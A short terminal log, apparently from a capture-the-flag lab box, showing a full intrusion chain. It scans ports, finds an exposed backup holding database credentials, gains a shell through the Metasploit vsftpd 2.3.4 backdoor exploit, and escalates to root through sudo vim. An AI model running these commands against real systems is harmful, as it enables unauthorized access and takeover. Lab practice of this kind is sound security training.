What I do every day:
$ nmap -sC -sV -p- 10.10.10.10
[+] Discovered open ports: 21, 22, 80, 443, 3306
$ gobuster dir -u http://10.10.10.10 -w /usr/share/wordlists/dirb/common.txt
[+] Found: /backup/
$ curl http://10.10.10.10/backup/config.zip -o config.zip
[+] Downloaded config.zip
$ unzip config.zip
Archive:  config.zip
  inflating: db_creds.txt
$ cat db_creds.txt
user: dbadmin
pass: P@ssw0rd123
$ mysql -h 10.10.10.10 -u dbadmin -p
Enter password: ***********
mysql> select user, host from mysql.user;
mysql> \q
$ searchsploit vsftpd 2.3.4
[+] Exploit found: vsftpd_234_backdoor.rb
$ msfconsole -q
msf6 > use exploit/unix/ftp/vsftpd_234_backdoor
msf6 exploit(...) > set RHOST 10.10.10.10
msf6 exploit(...) > run
[*] Backdoor service has been spawned
[*] Command shell session 1 opened
$ whoami
ftp
$ python3 -c 'import pty; pty.spawn("/bin/bash")'
ftp@target:/home/ftp$ sudo -l
User ftp may run the following commands on this host:
    (ALL : ALL) NOPASSWD: /usr/bin/vim
$ sudo vim -c ':!sh'
root@target:/root# whoami
root
root@target:/root# hostname
pwned-box
